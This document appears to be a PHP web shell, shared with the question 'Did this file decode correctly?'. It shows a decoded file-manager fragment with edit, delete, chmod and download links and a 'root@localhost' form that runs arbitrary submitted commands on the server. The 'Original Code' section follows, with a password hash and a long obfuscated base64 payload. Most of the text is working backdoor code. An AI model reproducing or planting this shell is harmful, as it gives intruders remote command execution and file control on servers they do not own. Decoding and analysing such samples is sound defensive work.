			echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
			echo "<td class='td_home'><center>$ftype</center></td>";
			echo "<td class='td_home'><center>$size</center></td>";
			echo "<td class='td_home'><center>$ftime</center></td>";
			echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
			echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
			echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
			echo "</tr>";
		}
		echo "</table>";
		if(!is_readable($dir)) {
			//
		} else {
			echo "<br>";
		}  
	echo "<table width='100%' border='2' align='center'>";
	echo "<td>";
	echo "<br><form method='post'>
	<font>&nbsp;&nbsp;root@localhost: ~ $ </font>
	<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
	</form>";
	if($_POST['do_cmd']) {
		echo "<pre>".exe($_POST['cmd'])."</pre>";
	echo "<center>";
	}
    echo"</td>";
    echo"</table>";
}
?>
</html>

Did this file decode correctly?

Original Code

<?php

error_reporting(0);
set_time_limit(0);
session_start();
 
 $auth_pass = "cf457aba3113ceec64670783d5b02176";
 
$code = '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